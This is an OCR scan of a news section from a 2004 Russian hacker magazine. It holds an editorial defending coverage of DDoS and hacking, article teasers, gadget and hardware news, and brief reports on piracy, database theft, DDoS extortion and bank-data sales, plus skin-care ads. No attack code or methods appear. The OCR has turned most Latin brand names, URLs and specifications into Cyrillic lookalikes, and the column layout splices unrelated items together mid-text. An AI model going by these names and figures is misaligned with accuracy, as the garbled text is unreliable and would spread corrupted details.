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Ты смотришь телевизор? Чест- 
но говоря, я тоже редко это де- 
лаю. В основном, на кухне за 
завтраком - ем и одновременно 
смотрю утреннюю программу 
по какому-нибудь общерос- 
сийскому каналу. Знаешь, что я 
там вижу в сводках новостей? 
Одни террористы захватили 
детишек в школе и расстреляли 
половину учительского состава. 
Другие террористы захватили 
автобус и требуют от государ- 
ства выполнения их условий. А 
еще шахидки -смертницы рвану- 
ли пару фугасов возле гостини- 
цы «Националь». Такое чувство, 
что нам нечего больше показы- 
вать. А еще впечатление, что 
терроры совсем охренели и тво- 
рят беспредел вообще не по по- 
нятиям. Заходя в Сеть, я наде- 
юсь оторваться от этого грязно- 
го мира, погрузиться в паутину 
битов и шифров. Но что я полу- 
чаю в ответ? Мой любимый сайт 
уже третий меся цДДоСят турки, 
асю моей хорошей знакомой уг- 
нали какие-то черти и требуют 
от нее взамен интима. Да то же 
самое творится, что и в реаль- 
ной жизни. Вопрос: а что же вы 
все орете, что моджахедам нет 
места в этом грешном мире? Вы 
же сами участвуете в войнах, 
пусть они и виртуальные. 

Да, мы пишем о технологиях 
ДДоС -атак. Да, мы пишем о 
том, как взламывать системы. 
Но и криминальные газеты то- 
же дотошно и в красках распи- 
сывают способы убийств. Но 
это же не значит, что нужно хва- 
таться за нож и идти резать 
своих соседей. Мы просто хо- 
тим донести до вас, читатели, 
технологию устройства компь- 
ютерных систем - не более. 
Ведь за ними будущее. 
Задумайся, чуви, начни осмыс- 
ление этого мира с себя. Поп- 
робуй поменять что-то в себе. 
Не выплескивай агрессию, да- 
ви ее в себе, борись с ней! 
Начать перемены стоит с себя, и 
тогда мир изменится к лучшему. 

Короче, я сказал, что хотел. 

ЬООЫік 
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Каждый ѵѵеЬ-разработчик 
только мечтал о инструменте, 
который объединил бы в себе 
самые необходимые разра- 
ботки. Теперь такой инстру- 
мент есть. 
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Ты наверняка не раз предс- 
тавлял себя агентом 007, те- 
перь ты можешь приблизить- 
ся к тайному делу шпионажа. 
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О теории РРоЗ-атак ты слы- 
шал уже много, пришло время 
лабораторной практики! 




ИНТЕРВЬЮ с главный 
КОКЕРОМ ЕЕѴЕ НІСІТШ 
8ЕСІІКІТѴ 




«Главный хакер» -это не понт, 
это такая должность в одной из 
лучших зесигііу-корпораций :). 




подложи свинью 
в консопь 



Иногда даже смурным юниксои- 
дам хочется повеселиться и 
поприкалываться над коллега- 
ми. Несколько интересных спо- 
собов ты найдешь в этой статье. 
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К омпания Рщйзи представила универ- 
сального робота-носильщика. Еще в 
фойе дроид приветствует гостей отеля 
хриплым баритоном. Уточнив номер ком- 
наты, Зегѵісе ВоЬо! берет тяжелые чемо- 
даны в обе «руки» и начинает движение в 
сторону лифта. А если вещей много, вы- 
катывает специальную тележку. Элект- 
ронная карта отеля, восемь камер и ульт- 
развуковые сенсоры позволяют роботу 
преодолевать любые препятствия. Пра- 
вое и левое колеса вращаются независи- 
мо, поэтому движение по наклонным и 
неровным поверхностям дается легко. 
Используя систему обработки трехмер- 
ных изображений, робот может хватать 
предметы и протягивать их гостям. За 
реалистичное движение «рук» отвечает 
модель нервной системы позвоночных. В 
продолжение своей миссии Зегѵісе ВоЬо! 
нажимает кнопку вызова лифта, подни- 
мается на этаж и провожает гостей в но- 
мер. Робот чутко воспринимает голосо- 
вые инструкции. Три микрофона позволя- 
ют ему определить источник команд, что- 
бы обернуться на голос. Справки об оте- 
ле можно получить на цветном сенсор- 
ном экране. Робот подключен к интерне- 
ту по интерфейсу ѴѴі-Рі 802.1 1 Ь. Дроид 
самостоятельно контролирует заряд ба- 
тареи и время от времени отправляется 
на базу для индукционной подзарядки 
без прямого контакта с зарядным устрой- 
ством. Ночью робот бодро патрулирует 
коридоры отеля. Размеры Зегѵісе ВоЬо! - 
65x57x130 см. Вес робота - 63 кг. Ско- 
рость движения - до 3 км/ч. Зегѵісе ВоЬо! 
поступит в продажу в июне 2005 года по 
цене 18 тысяч долларов. ■ 



ВЗЛОМ 



СУД НОД РУССКОЙ КРОКЕРШЕЙ 



Т ы, вероятно, в 
курсе, насколько 
редкое явление на 
русской хаксцене ха- 
керши. Нет, они есть, 
и некоторые очень да- 
же компетентны в об- 
ласти зесигі!у, но это, 
скорее, единичные 
случаи. А еще меньше 
девушек, которые 
жить не могут без ко- 
пания в ЮА и ЗоЙІсе, 
исправляя одни биты 
на другие. Одну из та- 
ких редких теток, офи- 
циально работающую 
админом, недавно 



сцапали доблестные 
сотрудники правоох- 
ранительных органов 
г. Петрозаводск. При- 
няли кракершу за то, 
что она взломала за- 
щиту лицензионной 
версии компьютерной 
бухгалтерии и прода- 
вала прогу всем жела- 
ющим. Пиратский СР 
у нее можно было 
взять за 3000 рублей, 
в то время как лицен- 
зия стоит $2800. Что- 
бы привлечь клиен- 
тов, тетка дала объяву 
в газету. Это не прош- 



ло незамеченным, и 
отдел «К» МВД Каре- 
лии выслал своего 
сотрудника на конт- 
рольную закупку. На 
месте, где должна 
была состояться про- 
дажа, девочку и по- 
вязали. Как к ее тем- 
ным делишкам отне- 
сется суд, пока зага- 
дывать рано. Но учи- 
тывая то, что это ее 
первый арест, скорее 
всего, малышка отде- 
лается небольшим 
штрафом и 1-2 года- 
ми условно. ■ 



машина 

УТЕШЕНИЙ 



П женнифер Бау- 
майстер из Герма- 
нии изобрела машину 
утешений. В основу 
Сопл!ог! ХХІ_ лег старый 
игровой автомат. Его пе- 
рекрасили в зеленый 
цвет, цвет надежды. В 
базу данных вошла доб- 
рая сотня видеороликов, 
в которых совершенно 
разные люди - мужчины, 
женщины и дети - про- 
износят ободряющие 
речи. Загорелые дев- 
чонки восторженно пи- 
щат: «Ты классный! Ты 
красивый! Просто фан- 
тастика!». Грузный муж- 
чина задумчиво изрека- 
ет: «Помни, могло быть 
намного хуже». Аппара- 
ты уже установили в од- 
ном из полицейских 
участков и в берлинском 
госпитале. Денег за уте- 
шение не берут. Похоже, 
это реальная альтерна- 
тива общению с больны- 
ми раком яичек из «Бой- 
цовского клуба». ■ 





ЖЕЛЕЗО 



Н овый чипсет ѴІА К8Т890 представила недавно ком- 
пания ѴІА. В официальном пресс-релизе компании 
говорится, что новые микросхемы будут работать с про- 
цессорами АІѴЮ А!Ыоп 64/64 РХ/Оріегоп/Зетргоп, при 
этом чипсет поддерживает графику РСІ Ехргезз хіб и 




обеспечивает работу 4 портов РСІ Ехргезз хі с пропуск- 
ной способностью до 250 Мб/с в каждом направлении. 
Кроме всего прочего, микросхема северного моста под- 
держивает технологию ѴІА Нурег8 (с 16-битной шиной 
НурегТгапзрогі, работающей на частоте 1 ГГц), а также 
архитектуру асинхронной шины. Что касается южного 
моста (ѴТ8237), то в этой микросхеме реализована под- 
держка следующих технологий: Ш!га Ѵ-І_іпк с пропускной 
способностью 1066 Мб/с, 7.1 аудиоконтроллер ѴІА ѴіпуІ 
СоІсІ с интегрированным 6-канальным ѴІА ѴіпуІ, поддерж- 
ка 4 ЗАТА-устройств, 8 портов 115В 2.0/1 .1 , 6 слотов РСІ, 
Ѵ-ВАЮ - РАЮ 0, РАЮ 1, РАЮ 0+1 & №00 (ЗАТА), ѴІА 
ѴеІосі!у СідаЬі! Е!Ьегпе! и интегрированный сетевой адап- 
тер 10/100 Раз! Е!Ьегпе!. 
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ЖИВОЕ ОДЕЯЛО 



НІТЕСН 



К анадский художник Николас Стэдман (мш.піскзіесі- 
тап.сот) представил «живое» одеяло. Роботизирован- 
ное существо напоминает неуклюжую каракатицу, накры- 
тую простыней. Устройство оборудовано микропроцессо- 
ром РІС и беспроводным передатчиком. Глазами роботу 
служит внешняя видеокамера, фиксирующая перемеще- 
ния людей в пространстве. Одеяло выбирает момент, не- 
заметно подкрадывается к «жертве» и пробует ее приоб- 
нять. Тело каракатицы спрятано в десятки мягких надувных 
подушек, каждая из которых снабжена тактильными сенсо- 
рами. Если «жертва» капризничает, вырывается, одеяло 
может обидеться и уползти прочь. На выставке «АгШоІз: 
ТИе ПоЬоІ Таіепі ЗГіоѵѵ», которая прошла в конце сентября, 
робот ластился, как котенок. ■ 




ЯДРЕНЫЙ 

ПРОПЕЛЛЕР 



ЖЕЛЕЗО 




Н овый и чрезвычайно 
красивый кулер выпус- 
тила компания ТТіегтаІІаке. 
Новинка используется для 
охлаждения кристаллов 
Репііит 4 под разъем І_ОА 
775. Основная фишка моде- 
ли заключается в том, что ее 
радиатор имеет медные теп- 
лоотводные трубки, повыша- 
ющие эффективность охлаж- 
дения. Также применен но- 
ваторский подход и в самом 
управлении потоком воздуха: 
в нашем случае проходящая 



через кулер струя прохлад- 
ного воздуха обдувает не- 
посредственно ядро, минуя 
всю оставшуюся площадь 
верхней части процессора. 
Новинка имеет размеры 
82,61x76x45 мм и изготовле- 
на из алюминия. Теплоотвод- 
ные трубки выполнены из 
меди и имеют диаметр 6 мм, 
размеры вентилятора - 
90x90x25 мм. Двигатель про- 
пеллера питается напряже- 
нием 12 вольт и потребляет 
2,16 Вт мощности, выдавая 
2500 об/мин. При этом мак- 
симальный наблюдаемый ток 
воздуха составляет 42,91 
СЕМ, а уровень шума - 21 
дБа. Если верить пресс-ре- 
лизу, этот пропеллер может 
легко налетать 40 тысяч ча- 
сов, при этом если скинуть 
его со второго этажа челове- 
ку на голову - травмы не из- 
бежать, весит он 522 г. 



китайский 

БУНТ ПРОТИВ 
8ѴИ0ИТЕС 




К итайская програм- 
ма Ргеедаіе поль- 
зуется большой попу- 
лярностью среди китай- 
цев. У нее только заре- 
гистрированных юзеров 
более 200 тысяч. Нет, 
это не порно-пазл. Эта 
утилита прорубает тон- 
нель в Великом Китайс- 
ком файрволе, блоки- 
рующем доступ милли- 
онов китайцев к непот- 
ребным ресурсам (в 
Китае со свободой сло- 
ва напряженка). Но в 
один прекрасный день 
Ргеедаіе перестала ра- 
ботать, и братья наши 
меньшие опять лиши- 
лись качественного ев- 
ропейского порно. Как 
оказалось, причиной 
тому был антивирус 
компании Зутапіес, в 
котором фригейт занес- 
ли в черный список под 
видом троянца. Китай- 
цы всполошились, за- 
галдели, подняли бунт. 
Шутка ли, опять без ев- 
ропейской порнухи 
жить. Зутапіес подума- 
ла и решила, что с Ки- 
таем связываться себе 
дороже. Поэтому по- 
обещала исключить 
прогу из блэк-листа. 
Европейские прелести 
станут доступны китай- 
цам после очередного 
обновления онлайновой 
базы антивиря. ■ 




СІеагазіІ рокмеы 
ЧИСТАЯ КОЖА 

БЕЗ ПРОБЛЕМ! 




УНИКАЛЬНАЯ ЛИНИЯ ПО УХОДУ ЗА КОЖЕЙ 
СЬЕАКАЗИ РОК МЕМ (мульти-эффект) 

Гель для бритья 

♦ обеспечивает мягкое, комфортное бритье 
без раздражений 

♦ поддерживает чистоту кожи 

♦ предотвращает появление прыщей 



шѵѵ.сіеагазіі.ги 



ВООТ8 НЕАЬТНСАКЕ 
ШТЕКМТЮМЬ 



ір сертифицирован. 








ХПКЕР/№1 01701/2004 




РПДИОПРИЕМНИКШІ-ГІ 



НІТЕСН 




Р нглийская компания Песіѵа 
(ѵѵѵѵѵѵ.гесіѵа.сот) представила 
прототип хай-тек радиоприемника. 
Внешне он ничем не отличается от 
классического устройства. Однако 
заточен девайс не под обычный 
радиоэфир, а под вещание интер- 
нет-радиостанций. Компьютер для 
прослушивания вообще не нужен. 
Радиоприемник выходит в Сеть че- 
рез беспроводное соединение ѴѴі- 
Рі. Поддерживаются форматы ве- 
щания ВеаІ Аисііо, ѴѴіпсІоѵѵз Месііа, 
МРЗ и Одд ѴогЬіз. Серийный вы- 
пуск устройства пока только пла- 
нируется. Но спрос на новинку 
прочат феноменальный. ■ 




РЕЗОК 



ЖЕЛЕЗО 



Н овый резак, предназначенный для рабо- 
ты с дисками ШО+/-П/КѴѴ, представила 
компания Ріехіог. Новинка поддерживает ре- 
жим 4х при работе с двухслойными дисками 
и 16х при записи 0\Ю+В/ 0\Ю-В, РХ-716А. 
Основной фишкой привода, которая отдель- 
но упоминается в пресс-релизе, является 
совмещенное использование технологий 
ІпІеІІідеп! Ш (механизм трехмерной коррек- 
тировки положения головки для уменьшения 
колебаний) и РоѵѵеПес (система выбора оп- 
тимального качества записи при максималь- 
ной скорости). Также применяется техноло- 
гия, позволяющая определить стандартное 
отклонение чистого носителя и оптимизиро- 
вать процесс записи для попате-болванки. 
Что касается характеристик, вот они: 

^ Запись: ОѴОЧМбх, ОБ ОѴО+К: 4х,(М: 48х. 
а Перезапись: ОѴО+КИІ: 8х г ОѴО-КѴѴ: 4х г СО-КИ: 24х. 

^ Чтение: ОѴР-КОМ: 16х, СО-КОМ: 48х. 

А Время доступа: менее 100 мс для СО, 150 мс для 0Ѵ0. 
а Бусрер: 8 Мб. 

а Поддержка фонового форматирования носителя. 

^ Интерфейс: Е-ЮЕ (АТАРІ). 
а Размеры: 146x41,3x170 мм. 
а Масса: 1 кг. 

а Наработка до отказа: 60 тыс. часов. 



вирусиейкеры оставляют 

РЕЗЮМЕ В КОДЕ ЧЕРВЕЙ 



ВЗЛОМ 



В се слышали про червя МуОоопл. Его 
модификации - МуОоопл.Ѵ и 
МуРоот.ІІ - продолжают гулять по Сети, 
заражая машины неосторожных юзеров и 
устанавливая на них троян Зигііа. Приме- 
чательно то, что в коде этих двух червяч- 
ков антивирусники обнаружили скрытое 
послание, адресованное им же: «Под- 
киньте работенку, чуваки!». Энтузиазма 
брать на работу вирусмейкеров у антиви- 
русных компаний не обнаружилось. Все 
скептически относятся к посланию. Нап- 
ример, старший консультант антивирусной компании Зоріпоз Грэм Клали 
прокомментировал это так: «Все очень просто - если вы написали вирус, вас 
никогда не возьмут на работу. Мало того, что создавать зловредный код не- 
этично, возникает еще и вопрос, можно ли доверить таким людям програм- 
му, ежедневно защищающую миллионы пользователей во всем мире». 
Кроме того, писать вирусы и создавать для них антивирусы совсем не одно и 
то же. Для первого, по мнению Клали, особых мозгов не нужно. Намного слож- 
нее написать устойчивый, совместимый код антивирусных сегментов. 

ППОТР ДЛЯ Р4 



ЖЕЛЕЗО 



Эта модель заточена под процессоры 
Репііит 4 с НурегТГігеасІіпд и оснаще- 
на разъемом Воске! 478. Вот основ- 
ные характеристики новинки: 

А Набор логики: АН КХЗЗО + АН 8В300. 
а 4 разъема для памяти 0БК266/333/400 ЗОНАМ, 
максимальная емкость -4 Гб. 

А 2 ЗАТА, 2 ІШМА АТА 100/66, 3/Р 01Р, 1 А6Р (8х/4х- 
А6Р 3.0), 1,5 В, 5 РСІ (РСІ 2.3), 6 113В 2.0/1. 1. 

А Интегрированный сетевой адаптер КеаІІек 
КП8100С. 

а Интегрированный звук КеаІІек АБС655. 
а Форм-фактор - АТХ (30,5x24x4 см). ■ 




Н овую плату для процессоров 
РепНипл 4 презентовала компания 
СідаЬуІе. Новинка, ОА-8ТВХЗЗО-Ц ра- 
ботает на базе чипсета ВХЗЗО от АН. 




ГИБНРНИКОВ 

ПОИМЕПИ 




К ак ты думаешь, как 
ГИБДДшники узна- 
ют по номерам имя 
владельца машины? 
Правильно, у них есть 
база данных, куда акку- 
ратно заносится ин- 
формация обо всех ав- 
толюбителях и их же- 
лезных лошадях. Эта 
БД конфиденциальна, и 
доступ к ней так просто 
получить нельзя. Но ру- 
ководитель одного 
ООО, которое настраи- 
вало сеть для отделе- 
ния ГИБДД и с которым 
инспекция заключила 
двустороннее соглаше- 
ние, решил, что ему 
можно. И под благим 
предлогом с января по 
август 2004 г. скачивал 
базу на свой комп. Ка- 
ким-то образом негод- 
ника удалось засечь, и 
теперь он отвечает на 
вопросы следователей. 
Таким образом, мили- 
ции удалось поймать по 
горячим следам одного 
из поставщиков контен- 
та тех дисков, которые 
нам пытаются впарить 
в метро (БД ГИБДД, 
«09», МТС и «Мега- 
фон»). Против пирата 
возбуждено уголовное 
дело по статье 362 
(«Похищение, присвое- 
ние, вымогательство 
компьютерной инфор- 
мации или завладение 
ею путем мошенниче- 
ства или злоупотребле- 
ния служебным поло- 
жением»), и теперь его 
ждет штраф до 200 ми- 
нимальных з/п. я 



б 







НІТЕСН 



В семействе внешних жестких дисков 
Махіог пополнение - менеджеры ком- 
пании представили линейку ОпеТоисИ II, 
которая позиционируется прежде всего как 
панацея от проблем, связанных с резерв- 
ным копированием данных. Собственно, 
уже в самом названии устройств кроется 
разгадка: все операции, связанные с резе- 
рвным копированием информации, выпол- 
няются при нажатии единственной кнопки 
на накопителе. При этом используется спе- 
циальный обучаемый софт - Рап 
Веігозресі С помощью фирменной техно- 
логии Махіог ОгіѵеІ_оск владельцы новых 
винчестеров могут создавать на диске ло- 
гические области, защищенные паролем. 
При этом постановка на охрану происходит 
сразу после отключения диска от системы. 
Среди прочих фишек ОпеТоисИ II я бы от- 
метил возможность создавать резервную 
копию всей системы и впоследствии ис- 
пользовать ее для загрузки в случае техни- 
ческих проблем. Ниже я приведу основные 
характеристики устройства, которые упо- 
мянуты в пресс-релизе: 



9 ченые немецкого университета 
Фрайбурга сконструировали робота, 
играющего в настольный футбол. Железя- 
ке КіПо не занимать внимательности. 
Полсотни раз в секунду робот оценивает 
ситуацию на столе и решает, как действо- 
вать. За положением мяча и наклоном 
фигурок следит видеокамера. Она распо- 
ложена под стеклянным полем, прозрач- 
ным снизу и зеленым для тех, кто наблю- 
дает за игрой. В компьютер заложены все 
данные о динамике мяча. После того как 
выбрана тактика, приводятся в действие 
моторы, вращающие и двигающие стерж- 
ни с фигурками. С каждым новым матчем 
робот играет сильнее. Сегодня он умуд- 
ряется продуть всего одну игру из шести. 
А лет через пять, вероятно, сможет по- 
бить человека, чемпиона мира. ■ 



внешний мпхтов настольный 

ФУТБОЛ 




л Скорость вращения шпинделя: 7200 об/мин (250 Гб 
модель), 5400 об/мин (300 Гб модель). 

^ Емкость: 250/300 Гб. 
л Бусрер: 16 Мб. 

А Интерфейс: Гіге№ге/11$В 2.0. 
а Среднее время позиционирования: 9,0 мс. 

^Габариты: 41x140x210 мм. 

А Масса: 1,38 кг. 

А Рекомендованная цена: $380 за 300 Гб модель, $320 за 
250 Гб. 



РЫБЬЯ РЕППЬНОСТЬ 



НІТЕСН 



Р мериканец Кен Ринальдо дал аквариумным рыбкам настоящую 
свободу передвижения. Для этого он поместил аквариумы на 
подставки на колесах. Вокруг же установил инфракрасные датчики, 
фиксирующие положение рыбок. Когда бойцовый петушок подплы- 
вает к стенкам аквариума, инсталляция начинает движение. Так рыб- 
ки могут исследовать внешний мир. Особи в разных аквариумах по- 
лучили возможность общаться. Во время сближения их разделяют 
лишь тонкие стенки из стекла. Человек тоже в буквальном смысле погружается в новую «рыбью 
реальность». На стены проецируются изображения с беспроводных видеокамер на дне аквариума. 
Как бы смотришь на аквариум снаружи и одновременно чувствуешь на себе взгляд изнутри. ■ 




СІеагазіІ рокмем 
ЧИСТАЯ КОЖА 

БЕЗ ПРОБЛЕМ! 




УНИКАЛЬНАЯ ЛИНИЯ ПО УХОДУ ЗА КОЖЕЙ 

СЬЕАВАЗИ. РОК ІШ (мульти-эффект) 

Пенка после бритья хрустящий эффект!!! 

♦ обладает свежим бодрящим ароматом 

♦ охлаждает и успокаивает кожу 

♦ предотвращает появление прыщей 

Бальзам после бритья 

♦ увлажняет кожу на 24 часа 

*> успокаивает раздраженную бритьем кожу 

♦ предотвращает появление прыщей 




ѵѵш.сіеагазіі.ги 



ВООТ8 НЕАЬТНСАЕЕ 
ШТЕКМТЮМЬ 



Товар сертифицирован. 
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ЖЕЛЕЗО 


1 



подушки дпя влюбленных МИНИПТЮРНЫЕ 5 МП 
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Л аборатория РІау ЗМо (рІау.Ш.зе) на 
базе шведского Интерактивного инс- 
титута представила прототип подушек для 
влюбленных. А именно для тех, кого раз- 
лучило расстояние. Беспроводной чип со- 
единяет подушки с ближайшим компьюте- 
ром. Через интернет они взаимодейству- 
ют друг с другом, в какой бы точке плане- 
ты ни находились. В каждую подушку 
вплетена сеть из тончайших электролюминесцентных волокон. Когда одна 
сторона лобзает и душит свою подушку, подушка партнера начинает све- 
титься. Чем сильнее объятия, тем отчетливее выступает неоновый рисунок. 
Разработчики справедливо замечают, что подушки частенько хранят секре- 
ты, переживания и мечты влюбленных. Телеобщение через этот глубоко 
личный предмет помогает справиться с зеленой тоской по другу. ■ 

ОКНО В ПОРИЖ 




Р мериканец Райан Хоглэнд ус- 
тановил над своим камином 
виртуальные окна Ѵігіиаі ѴѴіпсІоѵѵз 
(ѵѵѵѵѵѵ.ііоаду.огд/ѵігіиаіѵѵіпсіоѵѵ). Для это- 
го он встроил в обычную раму во- 
семь цветных ЮР-панелей. Они 
подключены к двум четырехпорто- 
вым видюхам пѴісІіа Оиасіго РСІ. 
Для задней подсветки используется 
отдельный блок питания АТХ. Раз- 
решение исходной картинки на 
компьютере - 3072x2048 пикселов. 
Программка на ѴізиаІ Вазіс каждые 
15 минут делает нарезку и раски- 
дывает изображения по дисплеям. 
Райну пришлось повозиться с 
дрелью, чтобы панели плотно при- 
легали к стене. От видео он отка- 
зался по той причине, что пропуск- 
ной способности шины РСІ было 
недостаточно. Скоро Райан обеща- 
ет взять реванш. Ѵіііиаі ѴѴіпсІоѵѵз 




І_2), которая будет представлена на 
рынке в 4 цветовых вариантах: се- 
ребряный, голубой, красный и тем- 
но-серый. Новинка интересна преж- 
де всего своими размерами: 
90x47x19 мм - это чуть меньше 
среднего современного 05М -теле- 
фона. Вот основные характеристики 
новой модели: 

л Сенсор: 1/2,5 дюйма, ПЗС, 5 млн. эффективных 
пикселов. 

л Разрешения снимков: 2592x1944, 2048x1536, 
1600x1200, 640x480. 

а Запись видеоклипов: 640х480Шр$, 320x240 и 
160х120Шр$. 

а расстояние: 39 мм в 35-мм эквиваленте. 

^ Цифровое увеличение: 5,6х. 
а Минимальная дистанция фокусировки: 3 см в 
режиме макросьемки. 

а Светочувствительность: 130 50/100/200/400. 

А Экспокоррекция: *2 ЕѴ с шагом 1/3 ЕѴ. 

^ Диапазон выдержек: 15-1/5000 с. 
а Баланс белого: автоматический, 5 
предварительных настроек, ручная установка. 
а Пакетная съемка: до 17 кадров (0,9 Ер$). 
^Видоискатель: оптический. 
а ЖК-экран: 1,5 дюйма, ТЕТ, 78 тыс. пикселов. 

А Интерфейсы: 115В, АѴ-выход. 
а Носитель данных: карты 50. 

^ Источник питания: ИВ-ЗБ. 
а Размеры: 90x47x18 мм. 
а Масса: 100 г. ■ 



ѵ2.0 будут реализованы на техноло- 
гии РСІЕ. Такие виртуальные окна 
позволяют путешествовать, не вы- 
ходя из дома. Они воссоздают уми- 
ротворяющую атмосферу морского 
вояжа, в котором мимо тебя проно- 
сятся диковинные пейзажи. ■ 



Л юбопытное устройство предло- 
жила на суд потребителей ком- 
пания Сапоп. На этот раз она пора- 
довала нас цифровой камерой 
Бідііаі 1X115 І5 (в США - РоѵѵегЗІюІ 
5Р20, в Японии - Сапоп ІХУ ОідйаІ 



ТЕЩЕ В ЗОД 



П жузеппе Каннелла из английского графства Бедфорд- 
шир остроумно избавился от ворчливой тещи. Старуш- 
ка страдает болезнью Паркинсона, но очень любит выезжать 
за город. Заботливый зять-авиамоделист немного модифи- 
цировал старую инвалидную коляску. Он приладил к ней не- 
большой реактивный двигатель и рулевое управление. Во 
время испытаний коляска разогналась до скорости 1 00 км/ч. Теща от такой идеи 
пришла в восторг. Теперь с ежедневной прогулки она возвращается только под 
вечер. Интересно, что в самом начале авиамоделист экспериментировал с кар- 
том. Мысль раскурочить инвалидную коляску тещи подкинула ему жена. ■ 




ГОЛУБЫЕ ДИСКИ В ЛТЛКЕ 



ЖЕЛЕЗО 



В ремя не стоит на месте, и то, что 
еще вчера казалось новинкой и 
верхом технологического кича, уже 
сегодня уходит в прошлое, уступая 
место новым и более передовым тех- 
нологиям. Следуя этому правилу, ги- 
гант Зопу продолжает продвигать на 
рынке технологию ВІи-Вау. На этот 
раз представители компании сообщи- 
ли о начале разработки 8-слойного 
диска ВІи-Вау емкостью 200 Гб. Пла- 
нируется, что более подробная ин- 
формация будет предоставлена об- 
щественности 1 1 октября на между- 
народном симпозиуме по оптическим 



носителям, который будет проходить 
в столице Южной Кореи. 

Впрочем, несмотря на далеко идущие 
планы, первостепенной задачей ком- 
пании остается коммерциализация в 
ближайшие 2-3 года 4-слойного носи- 
теля емкостью 100 Гб. В настоящий 
момент сложилась непростая ситуа- 
ция. И Зопу, и ряд других компаний 
уже сейчас предлагают покупателю 
плееры с поддержкой ВВР. Однако 
эти устройства не могут занять значи- 
мой части рынка из-за фантасмаго- 
рично высокой цены и экзотичности 
этого формата для видеозаписываю- 



щих компаний. Теперь становится по- 
нятно, зачем Зопу купила Меіго- 
Ооісіѵѵуп - Мауег - с приобретением 
этого гиганта Зопу получила доступ к 
ряду кинолент студии и теперь может 
без предварительного согласования и 
переговоров перевести существен- 
ную часть рынка на новую техноло- 
гию. Такие вот монополисты. 

Также Зопу Сотриіег Епіеііаіпплепі 
заявила о своих планах по использо- 
ванию ВІи-Вау в игровой приставке 
РІауЗМіоп 3, которая появится на 
прилавках через 2 года. Как бы смеш- 
но это ни было, но именно использо- 



вание оптических носителей в игро- 
вой индустрии может оказать значи- 
тельное влияние на продвижение но- 
вого формата: стоит только вспом- 
нить, как РІауЗМіоп и РІауЗМіоп 2 в 
свое время помогли продвижению на 
рынке Ц\Ю. Р53, как предполагается, 
будет поддерживать ВІи-Вау Різс ем- 
костью до 54 Гб. 

Разработчикам ВІи-гау Різс стоит ус- 
корить работу над технологией - сей- 
час сложилась ситуация, когда нельзя 
терять попусту время, если, конечно, 
разработчики видят большое буду- 
щее у нового стандарта. і 
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БРОЗИПИЯ ВПЕРЕДИ 
ППОНЕТЫ ВСЕЙ 



судный пень 
для НЕРлдивого 
пдиинп 




Е сли Корея, Россия и Украина являются 
очагами пиратства, то страной-лиде- 
ром по количеству хакерских атак является 
Бразилия. По итогам прошлого года в этой 
стране было совершено 96 тысяч хакерских 
атак, что на порядок превышает количество 
взломов в любой другой стране мира. Объ- 
ясняется это просто - в Бразилии прави- 
тельство до сих пор не ввело наказание за 
компьютерные преступления. Чувствуя се- 
бя в полной безопасности, бразильские ха- 
керы объединяются в многочисленные 
группы с яркими названиями и развлека- 
ются всеми возможными способами. Прес- 
тупниками они себя не считают, ссылаясь 
на старую байку о вседоступности инфор- 
мации и интеллектуальном поединке с 
Системой. Чтобы привлечь к ответствен- 
ности самых борзых взломщиков, полиции 
приходится доказывать факт мошенничест- 
ва, что далеко не всегда получается. Кста- 
ти, помимо хакерских атак, Бразилия также 
лидирует по количеству сделанных здесь 
порносайтов. Аж две трети всей клубнички 
интернета было создано именно в этой за- 
мечательной стране. ■ 



«русская мпфия» 
ппрпФинит австрапию 



взлом 



В последнее время участились случаи шантажа русскими 
взломщиками австралийских бизнесменов, работаю- 
щих в сфере электронной коммерции. Киддисы требуют де- 
нег в обмен на тишину и спокойствие. «А иначе, - грозятся 
киддисы, - похачим, зарутим, порвем!». Один из последних 
инцидентов наделал много шума. Парни, называющие себя 
«русской мафией», потребовали с двух владельцев онлайно- 
вых букмекерских контор ШрУ/ігшШЬеІсоп и ѵѵѵѵѵѵ.сепІгеЬеісот 
откуп в размере $20 и $10 тысяч долларов соответственно. 
Но те платить отказались. В результате взломщики провели 
атаку на серверы эти контор и вывели их из строя на некото- 
рое время. Этого хватило, чтобы причинить владельцам 
ущерб в несколько миллионов долларов. Все бы ничего, но 
направленная на букмекеров атака каким-то образом заце- 
пила телефонную сеть Теізіга в городе Эллис. И на протяже- 
нии 5 часов жители городка вынуждены были сидеть без те- 
лефона и интернета, будучи отрезанными от остального ми- 
ра. Федеральная полиция Австралии, Интерпол, ФБР и Бри- 
танский национальный центр по борьбе с преступностью в 
сфере высоких технологий приступили к масштабным опера- 
циям по пресечению выходок «русской мафии» и других 
шантажистов. В одном из следующих номеров «Хакера» я 
расскажу о результате этих операций. ■ 



Н а днях будет, нако- 
нец, вынесен вер- 
дикт по поводу судеб- 
ного дела, которое ве- 
дется уже четвертый 
год. Главный его герой 
- Филипп Камминс. 
Что, ты не знаешь, кто 
такой Филипп Камене? 
Ок, рассказываю. В 
1999-2000 гг. этот пе- 
рец, работая в службе 
техподдержки компа- 
нии Теіесіаіа 

Соплтипісаііопз (ТСІ), 
снабжал сторонних лиц 
конфиденциальными 
данными, к которым 
имел прямой доступ. В 
основном это была ин- 
формация о счетах 
клиентов одного из 
банков-партнеров ТСІ. 
За каждый отчет Кам- 
минс получал по $30 и 
успел продать инфу о 
десятках тысяч счетов. 
В конце концов парня 
попалили и представи- 
ли к ответственности. 
В своих деяниях Филя 
быстро сознался, а 
когда ему сказали, что 
из-за него люди попа- 
ли на десятки миллио- 
нов долларов (до $100 
млн. в общей сложнос- 
ти), сделал шоковое 
лицо и страдальчески 
произнес: «Я не знал! 
Не полагал!». Конечно, 
на суде эти муки со- 
вести вряд ли будут 
рассмотрены. Чуваку 
светит от 14 лет по 
статье «Преступный 
сговор, мошенничест- 
во и компьютерное 
мошенничество». Воз- 
можно, судья сделает 
скидку на больное 
сердце Камминса, а 
также на то, что он по- 
обещал вернуть те 
бабки, которые успел 
наварить. Но сидеть 
ему придется в любом 
случае. Окончатель- 
ный вердикт будет 
провозглашен 1 1 ян- 
варя 2005 г. 




СІеагазіІ рокмем 
ЧИСТАЯ КОЖА 

БЕЗ ПРОБЛЕМ! 




УНИКАЛЬНАЯ ЛИНИЯ ПО УХОДУ ЗА КОЖЕЙ 

СІ.ЕАВА8ІІ. РОВ МЕИ (мульти-эффект) 

Шампунь-гель для душа 
и умывания 3 в 1 

♦ ухаживает за волосами 

♦ очищает и освежает кожу лица и тела 

♦ предотвращает появление прыщей 



ѵѵш.сіеагазіі.ги 



о 

ВООТ8 НЕАЬТНСАКЕ 
ШТЕМАТЮт 



Товар сертифицирован. 





ДОШЬ ѴІМ0Ѵ8 В ДЕРЕВНИ! 




